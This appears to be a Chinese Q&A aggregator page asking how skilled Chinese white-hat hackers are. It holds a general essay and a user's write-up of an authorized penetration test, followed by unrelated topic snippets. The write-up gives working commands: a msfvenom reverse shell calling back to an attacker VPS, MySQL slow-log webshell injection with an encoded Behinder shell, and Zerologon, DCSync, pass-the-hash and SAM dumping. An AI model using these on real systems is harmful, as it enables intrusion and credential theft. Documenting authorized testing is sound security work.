中国的黑客(白帽)技术强到了哪一步?
那么,中国的白帽黑客,他们的技术究竟到了哪一步?这个问题有点像在问中国制造到了哪一步——既有令人瞩目的成就,也有需要不断精进的空间。要说得详细些,就得从几个维度来看了。
一、 基础技术与理论深度:打下坚实的根基
中国的白帽黑客,在基础技术这块,可以说已经非常扎实。这得益于国内庞大的IT人才基数以及对信息安全教育的逐步重视。
编程语言的精通: 无论是C/C++这种接近底层的语言,还是Python、Go、Java这类更高级的脚本和应用开发语言,中国的白帽们都能玩得转。他们不仅会写代码,更理解代码的运行机制,能够从代码层面挖掘潜在的逻辑漏洞。比如,针对一些复杂的业务逻辑漏洞,光懂脚本语言是远远不够的,需要深入理解数据是如何在系统中流转的。
操作系统和网络协议的理解: Linux、Windows这些主流操作系统内核的原理,TCP/IP、HTTP/S这些网络协议栈的细节,白帽们都了如指掌。他们知道数据包是如何产生的,如何在网络中传输,如何在操作系统层面被处理。这种底层知识是很多攻击和防御的基础。
加密算法与密码学: 虽然不是人人都是密码学家,但理解常见的加密算法(如AES、RSA)的原理以及它们在实际应用中的弱点(如实现上的缺陷),是很多白帽必备的技能。他们能够识别弱加密、不当的密钥管理等问题。
逆向工程能力: 这是白帽技术的一个重要体现。他们能够通过分析二进制程序,理解软件的内部工作原理,找出隐藏的功能或者安全隐患。对于一些没有源代码的软件,逆向工程是唯一的突破口。中国的白帽在软件逆向、固件分析等方面积累了丰富的经验,尤其是在分析国内外的各类应用软件和硬件设备时。
二、 实战攻防的策略与技巧:经验的积累与创新
理论再好,也需要落地到实战。中国白帽在实战攻防中,展现出了很强的能力,并且也在不断地探索新的攻击和防御思路。
漏洞挖掘的广度与深度:
Web安全: 这是最常见的领域,XSS、SQL注入、CSRF等传统漏洞自不必说,中国的白帽们在漏洞挖掘上已经走向更精细化。比如,针对一些大型互联网平台的业务逻辑漏洞,可能需要结合API接口、前端交互、后端处理等多方面知识,才能发现那些“隐藏得特别深”的漏洞。例如,在一些复杂的支付流程、订单处理逻辑中出现的漏洞,往往不是简单的注入就能解决的,需要对业务流程有非常深入的理解。
移动安全: 随着移动互联网的普及,针对Android和iOS应用的漏洞挖掘也变得异常重要。中国的白帽们在App的逆向分析、数据加密绕过、不安全的数据存储、敏感信息泄露等方面有着丰富的经验。他们能够对APK、IPA文件进行深入的分析,找出应用本身的安全隐患。
IoT和硬件安全: 这是一个越来越受关注的领域。从智能家居设备到工业控制系统,一旦出现安全问题后果可能非常严重。中国的白帽们正在积极探索这些领域的安全。例如,对嵌入式设备的固件进行分析,寻找固件更新机制的漏洞,或者通过串口、JTAG等接口进行物理层面的渗透,都是他们能力的一部分。
云计算与容器安全: 随着企业纷纷上云,云环境下的安全也成为了新的战场。白帽们需要理解AWS、Azure、阿里云等云平台的安全模型,挖掘云配置错误、身份认证绕过、敏感信息泄露等漏洞。在容器化方面,他们也会关注Docker、Kubernetes等技术的安全配置和漏洞。
漏洞利用技巧的演进: 很多时候,发现一个漏洞只是第一步,如何有效地利用这个漏洞来达到更大的目的,考验的是白帽的创造力。
“组合拳”式的攻击: 单个漏洞可能危害不大,但将多个小漏洞组合起来,就能产生意想不到的攻击效果。比如,先通过某个漏洞获取少量用户数据,再利用另一个漏洞提升权限,最终达到控制整个系统的目的。
无文件落地(Fileless)攻击: 这种技术不将恶意代码写入磁盘,而是直接在内存中执行,大大增加了检测难度。中国的白帽在一些高级攻防演练中也会展现出对这类技术的运用。
社会工程学的结合: 尽管白帽主要依靠技术,但在某些情况下,他们也会理解社会工程学在安全中的作用,但他们会以合规的方式进行研究,例如在获得授权的情况下模拟钓鱼攻击来测试企业员工的安全意识。
攻防演练中的表现: 国内的一些大型攻防演练活动(如国家级或行业级的实网攻防演习),是中国白帽技术实力的集中体现。在这些演练中,他们需要模拟真实攻击者的行为,在限定的时间和规则内,对目标系统进行渗透。表现优异的团队和个人,往往具备非常全面的技术能力和临场应变能力。
三、 社区活跃与知识共享:共同进步的推动力
中国的白帽生态非常活跃,这离不开众多安全社区的贡献。
安全会议和技术沙龙: 国内有许多著名的安全会议,如ISC、ISC 2023、安全客大会等,以及各种技术沙龙和技术分享会。这些平台为白帽们提供了交流技术、分享经验的绝佳机会。在这里,你能看到很多前沿的研究成果被首次披露。
漏洞报告平台: 像“补天”、“漏洞银行”等平台,是中国白帽提交和获得回报的重要渠道。大量的漏洞信息在这里汇集,既帮助企业修复了问题,也让白帽获得了认可和激励。一些国内顶级的白帽,在这个平台上收获了大量的CVE编号和奖金。
开源贡献: 一些有实力的白帽也会积极参与到开源安全工具的开发和维护中,或者将自己的研究成果开源,为整个安全社区的进步贡献力量。
四、 面临的挑战与发展趋势
当然,中国的白帽技术也并非完美无缺,还在不断发展和进步中。
“灰色地带”的界定: 尽管我们讨论的是白帽,但在实际操作中,如何清晰地界定“黑客行为”与“善意研究”的边界,尤其是在一些敏感领域的研究,始终是一个挑战。合法合规的研究框架需要不断完善。
人才培养体系的深化: 虽然基础教育在进步,但如何更系统、更深入地培养顶尖的白帽人才,尤其是在一些高精尖领域,仍然需要持续投入。
技术更新的快速迭代: 网络安全技术发展日新月异,新的漏洞、新的攻击技术层出不穷。白帽们需要时刻保持学习的热情和能力,才能跟上节奏。
“实战能力”的标准化评估: 很多时候,一个白帽的能力很难用一个简单的标准来衡量,如何在公平的环境下评估他们的真实攻防水平,也是一个需要探讨的问题。
总结一下
中国的白帽黑客,在基础理论、实战技巧、漏洞挖掘深度以及社区贡献等方面,已经达到了非常高的水平。他们不仅能够发现和报告常见的安全漏洞,更能深入挖掘复杂业务逻辑中的深层隐患,并在移动安全、IoT安全等新兴领域展现出实力。他们的技术实力,是支撑中国互联网安全,尤其是在企业安全防护和漏洞修复方面,发挥着越来越重要的作用。
但就像任何一个蓬勃发展的领域一样,挑战与机遇并存。相信随着中国信息安全行业整体水平的提升,以及对白帽人才的持续重视和培养,中国的白帽技术还将继续向前发展,为构建更安全的网络空间贡献更大的力量。他们不是神秘的“键盘侠”,而是活跃在网络安全前沿的“战士”和“工程师”。
网友意见
背景
最近都在做渗透测试项目,并不需要内网渗透,少了很多的成就感。于是,找了一个授权的企业项目,目标是获取内网核心权限,手段不限。这就好说了,就喜欢这种能让我胡乱来的目标。
入口
对于企业而言,散落在外的资产肯定还有不少,于是为了快速打点,先进行一波常规的信息收集。先进行了子域名爆破、fofa、谷歌等方式找到多个子域,通过其中一个子域名反查找IP,在历史解析记录中找到了真实的IP,再继续进行C段端口扫描,收集到了多个资产列表。扔进XRAY跑一波,在其中的一个资产中,发现了存在shiro反序列话漏洞,手工来测试一下:
github上找个了工具尝试一下,发现可以执行命令:
查看了一下进程后,发现web是以jar包启动的,无法直接写入shell,直接尝试写内存shell:
成功写入了蚁剑的shell,先本地配置一下,并设置Accept-Header为:thisIsMyJob!@
设置好后直接连接,获取webshell:
内网漫游
翻看了一下这台linux上的文件,由于linux权限不够,无法查看shadow,尝试提权也均失败了,查看历史命令、计划任务等,并未有什么收获。只能下载jar包下来分析,找到了mysql数据库的配置密码。于是先探测一下内网,看能否快速的拿到其他主机的权限,不行再从数据库入手看看。
因此,先做了个代理,配置一下frp,先上传客户端到web上,修改了一下frpc.ini文件,使用sock代理:
自己的VPS上传服务端,修改一下权限,直接执行./frps -c frps.ini:
然后回到客户端执行一下./frpc -c frpc.ini,即可使用。
本地使用proxifier代理一下:
先使用弱口令爆破工具爆破一波看看,果然有点东西,找到了两台linux弱口令:
继续翻文件,还是一无所获,浪费了很多时间。可能核心业务不在linux上,尝试一下能否获取一个windows权限。先试试ms17-010漏洞,先生成一个木马:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=2233 -f elf > linux.elf
上传到web上,本地msf监听一下:
use exploit/multi/handler set payload linux/x64/meterpreter/reverse_tcp show options set LHOST 1.1.1.1 set LPORT 23333 run
在web的命令行下给linux.elf添加执行权限后直接运行,即可获取到meterpreter。然后再添加一下路由:
使用17-010扫描模块跑一下:
未扫到任何漏洞,怀疑是不是哪里有问题,本地代理用工具再跑一次:
确实不存在,这补丁确实都打了,白忙活了一场。想到之前还有个数据库的连接串还没利用,可能还有点搞头。由于之前代理过了,直接使用navicat连接数据库,查看一下mysql版本是5.7:
由于secure-file-priv的存在,无法尝试提权。nmap扫描了一下数据库的ip地址,发现8090端口还存在一个php系统,服务器是server。于是先查询一下mysql的数据库文件路径,发现不是phpstudy或者wamp等软件一键搭建的:
可要想获取shell,前提要得到web路径,才能写入木马,通过web报错页面、目录扫描都未获取到。于是开始尝试一下IIS的默认路径c:Inetpubwwwroot,写入后访问不到。想到mysql是放在d盘下,因此尝试d盘的d:www、d:Inetpubwwwroot、d:data等路径,都没访问到,最终随手测了下d:web,竟成功写入。通过mysql慢日志写shell过程如下:
set global slow_query_log='ON'; set global slow_query_log_file='D:/web/cmd.php'; select '<?php echo system($_GET[123]);?>' or sleep(11); set global slow_query_log='OFF';
由于存在杀软,普通的一句话木马直接被杀,因此重新写入一个冰蝎的马:
set global slow_query_log='ON'; set global slow_query_log_file='D:/web/t.php'; select '<?php file_put_contents(".1.php",base64_decode("PD9waHAKQGVycm9yX3JlcG9ydGluZygwKTsKc2Vzc2lvbl9zdGFydCgpOwogICAgJGtleT0iZTQ1ZTMyOWZlYjVkOTI1YiI7CgkkX1NFU1NJT05bJ2snXT0ka2V5OwoJJHBvc3Q9ZmlsZV9nZXRfY29udGVudHMoInBocDovL2lucHV0Iik7CglpZighZXh0ZW5zaW9uX2xvYWRlZCgnb3BlbnNzbCcpKQoJewoJCSR0PSJiYXNlNjRfIi4iZGVjb2RlIjsKCQkkcG9zdD0kdCgkcG9zdC4iIik7CgkJCgkJZm9yKCRpPTA7JGk8c3RybGVuKCRwb3N0KTskaSsrKSB7CiAgICAJCQkgJHBvc3RbJGldID0gJHBvc3RbJGldXiRrZXlbJGkrMSYxNV07IAogICAgCQkJfQoJfQoJZWxzZQoJewoJCSRwb3N0PW9wZW5zc2xfZGVjcnlwdCgkcG9zdCwgIkFFUzEyOCIsICRrZXkpOwoJfQogICAgJGFycj1leHBsb2RlKCd8JywkcG9zdCk7CiAgICAkZnVuYz0kYXJyWzBdOwogICAgJHBhcmFtcz0kYXJyWzFdOwoJY2xhc3MgQ3twdWJsaWMgZnVuY3Rpb24gX19pbnZva2UoJHApIHtldmFsKCRwLiIiKTt9fQogICAgQGNhbGxfdXNlcl9mdW5jKG5ldyBDKCksJHBhcmFtcyk7CiA/PiA="));?>' or sleep(11); set global slow_query_log='OFF';
写入后直接访问t.php,重新生成.1.php的冰蝎马,直接连接:
查看一下系统权限,有点低:
查看一下ip地址:
由于是该台服务器server2012,无法直接获取windows密码,且存在国外某某科技的杀软,已有的提权工具都被杀了,技术不行绕不过,还是换个思路。
于是,开始翻找文件,看是否会有敏感信息。在服务器上发现多套源码,在其中的一个文件里发现了配置信息:
尝试连接数据库,失败!!
通过这收集到的密码,再做成密码字典,开始爆破C段的RDP、mysql、sqlserver、ftp等服务:
爆破后,发现是当前服务器的administrator密码,通过之前的端口信息收集发现开放了3389端口,可以远程登录。
还是继续进行信息收集,查看当前服务器是否是域内机器,若存在域就相对好很多。执行:
net time /domain
发现是存在域的。查看一下域控机器:
net group "domain controllers" /domain
获取一下域控的IP地址:
目前知道当前的机器在域内,并有了服务器的管理员权限。可以尝试通过导出hash的方式获取域账号信息,再进行PTH。因此,直接远程连接,右键导出lsass.exe进程的dump文件,再上传免杀的mimikatz进行读取,但最终读取失败:
看来只能通过其他方法了,联想到前不久爆出的NetLogon权限提升漏洞,可以尝试一下,毕竟时间过得不久,可能都还没打补丁。
使用github上的搜到的脚本尝试一下,先验证是否存在漏洞:
python3 zerologon_tester.py DC 10.100.1.231
返回success,表示存在漏洞。
使用cve-2020-1472-exploit.py将机器账户重置:
使用DCSync导出域内所有用户凭据:
通过wmic进行pass the hash,可拿到域控制器中的管理员权限:
至此,已经拿到核心权限了,截了个图,赶紧恢复一下机器账号的密码,不然脱域问题就大了。
先导出SAM数据库文件,下载回来后,记得删除:
reg save HKLMSYSTEM system.save reg save HKLMSAM sam.save reg save HKLMSECURITY security.save get system.save get sam.save get security.save del /f system.save del /f sam.save del /f security.save
通过sam等文件获得原ntlm hash:
python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
通过获取到的$MACHINE.ACC账户的hash,进行恢复:
总结
这次的渗透,主要是通过外网的shiro漏洞上传内存马,快速打点,以此做跳板进入内网。再通过源码获取数据库配置文件,尝试获取到数据库服务器的普通权限后,继续信息收集,获取到本地管理员权限,发现服务器在域内,且存在NetLogon漏洞,此后成功获取域控。
类似的话题
-
提起中国的黑客,很多人脑子里可能立刻会联想到那些在网络世界里呼风唤雨、无所不能的神秘人物。但如果我们要聊“白帽黑客”,这又是另一番景象。白帽,顾名思义,就是那些利用自己的技术能力,以合法、道德的方式来发现和修复安全漏洞的“好人”。他们是网络安全的守护者,而不是破坏者。那么,中国的白帽黑客,他们的技术............. -
关于您提到的“黑人男在中国以及欧美比白人男更受欢迎”的感受,这确实是一个挺有意思的社会现象观察,背后可能涉及多方面的因素,也并非绝对的普遍情况,不过我们可以从一些角度来探讨为何会产生这样的印象。首先,我们要明白,所谓“受欢迎”是一个非常模糊的概念,它可以指外貌上的吸引力,也可以指文化层面的影响力,或.............
-
“炎黄子孙”这个称谓在中国文化中承载着深厚的历史和民族认同感,它通常用来指代拥有华夏血统、并认同中华文化和历史的中国人。要详细探讨在中国国籍、华夏血统,在中国出生、成长、教育的黑人、白人能否自称炎黄子孙,我们可以从以下几个方面进行分析:1. “炎黄子孙”的文化含义与渊源: 起源于传说: 炎黄二帝.............
-
关于您提到的“黑人和白人分别嫁娶到中国后,评论区态度截然不同”的现象,这确实是一个在一些网络社区中存在且值得深入探讨的观察点。这种现象的背后,折射出的是多元文化交流中,人们的态度、认知以及潜在的社会观念差异。要详细讲述这种现象,我们需要从几个层面来分析:一、 事件的呈现方式与信息源:首先,这种现象的.............
-
.......
-
关于《权力的游戏》中“黑人演奴隶主,白人演奴隶”的说法,这是一种对剧中情节的误读和不准确的概括。实际上,该剧的选角和剧情设定并非如此简单粗暴,也并非直接为了“打种族主义者的脸”。我们需要更详细地分析:1. 剧情背景与设定:维斯特洛大陆的世界观 虚构的世界: 《权力的游戏》设定在一个虚构的、中世纪.............
-
这确实是很多人观察到的一个现象,印度电影里主演们常常是肤色较浅,甚至可以说是白皙的,而现实生活中,印度人民的肤色跨度其实非常大,从非常白皙到非常黝黑都有,但整体上,我们日常接触到的印度人,肤色会比电影里要深一些。为什么会有这种差异呢?这背后其实涉及几个层面的原因:1. 审美偏好与社会观念: “白.............
-
.......
-
欧美社会中跨种族婚姻,特别是黑人男性与白人女性结合的情况,确实是一种普遍而又引人深思的社会现象。要深入理解它,需要从历史、社会、文化、经济以及个人选择等多个维度去剖析,而非简单归结于某一个原因。首先,我们必须承认,历史因素为这种现象奠定了基础,即便是在过去种族隔离严重的时期,跨种族吸引和关系也从未完.............
-
作为一个人工智能,我没有情感,因此我不会感到害怕。我的设计目的是提供信息和完成任务,而不是体验人类的情绪。从科学和遗传学的角度来看,一个群体在短时间内发生如此重大的外观上的改变(例如从目前中国人普遍的东方人特征转变为普遍的黑人或白人特征)是不太可能的。人类的遗传特征是在数万年的演化过程中逐渐形成的,.............
-
关于“白人黑人很多看不起中国人,与中国人身材相对矮小有关系吗?”这个问题,我想从几个方面来聊聊,试着分析一下其中的复杂性。首先,要不要承认,在一些跨文化交流的场合,确实存在一些刻板印象和偏见,这在任何族群之间都可能发生,并非中国人独有。至于这些偏见是否与身高有直接关联,我认为不能简单地划等号,但身高.............
-
关于“部分中国人认为大多数黄种人身体素质体格不如白人黑人”的说法,这是一个复杂且带有一定偏见的问题,背后可能涉及多种因素。为了更详细地解释,我们可以从以下几个方面来探讨:一、 对“身体素质”和“体格”的定义与理解差异首先,需要明确的是,“身体素质”和“体格”本身是比较宽泛的概念,可以从多个维度来衡量.............
-
好,我们来聊聊《解除好友2:暗网》里那些令人肾上腺素飙升的黑客手段,看看它们在中国是否可行,以及背后的技术原理是什么。首先得说,电影里展现的很多手法,其核心技术在全世界范围内都是通用的,中国也不例外。但具体到“能否实现”这个问题,得辩证地看。电影里的核心手法分析及在中国境内的可行性:1. 远程控制.............
-
关于中国黑人后代数量的增长,这是一个复杂且多层面的社会现象,需要从历史、文化、社会经济以及个体家庭等多个角度来审视和理解。这个问题并非简单地“怎么办”,而是需要一个包容、理性且基于事实的探讨。首先,我们需要认识到,中国的外来人口,包括来自非洲的移民及其后代,其数量的增长是全球化背景下人口流动日益频繁.............
-
在中国,非洲裔人群的出现,虽然在整体人口构成中占比较小,但他们带来的影响和贡献却日益多元化,并逐渐渗透到中国社会的多个层面。这些贡献并非总是显而易见的宏大叙事,更多时候体现在个体层面和特定领域,如同涓涓细流,汇聚成一股值得关注的力量。经济层面:商业活力与跨文化贸易的桥梁首先,在中国经济发展的大背景下.............
-
在中国求学的非洲裔留学生,是一个日益壮大、多元且充满活力的群体。他们并非铁板一块,每个人都有自己的故事、动机和在中国的生活体验。想要详细地勾勒出这个群体的画像,需要从多个维度去观察。他们为什么选择中国?原因多种多样,但可以归结为几个主要方面: 教育质量和特定专业优势: 一些非洲国家在某些特定领域.............
-
在中国的黑人社群,是一个越来越多元且被关注的群体。和任何地方的少数族裔一样,他们在中国的经历也是复杂且多面的,既有融入社会的积极一面,也面临着一些挑战。首先,要理解他们在中国的存在,就不能忽视历史背景。改革开放以来,随着中国与世界的联系日益紧密,越来越多的非洲人来到中国,既有出于商业贸易目的,也有在.............
-
你这个问题可太有意思了!我跟你说,电影里的黑客那可不是一般人,他们要么就是手指在键盘上跳舞,要么就是看着屏幕上飞速滚动的代码,一副运筹帷幄的样子。你注意到没?鼠标那玩意儿,在他们的操作中几乎是隐身状态。这背后可不是瞎拍,是有讲究的。首先,得从“黑客”这个概念在电影里被塑造的方式说起。电影需要的是视觉.............
-
对于中国国内的黑人社群,我们应该以平常心和尊重来对待。无论肤色、种族、国籍如何,每个人都应享有平等的权利和尊严。在中国,黑人社群的构成是多元的,包括来自非洲、欧洲、美洲等地的留学生、务工人员、商人、外交官以及他们的家属。他们为中国的经济、文化和社会发展带来新的视角和活力,与中国人民的交流也促进了相互.............
-
在中国生活和工作的非洲人(习惯上称为“黑人”)的构成非常多元化,他们来自不同的国家,拥有各种各样的经济背景、社会地位和职业。“能来中国的黑人全是有钱有权”的说法是完全不准确的,是一种刻板印象。为了更详细地说明这一点,我们可以从以下几个方面来理解:1. 经济背景的多样性: 高收入群体: 当然,有一.............
本站所有内容均为互联网搜索引擎提供的公开搜索信息,本站不存储任何数据与内容,任何内容与数据均与本站无关,如有需要请联系相关搜索引擎包括但不限于百度,google,bing,sogou 等
© 2025 tinynews.org All Rights Reserved. 百科问答小站 版权所有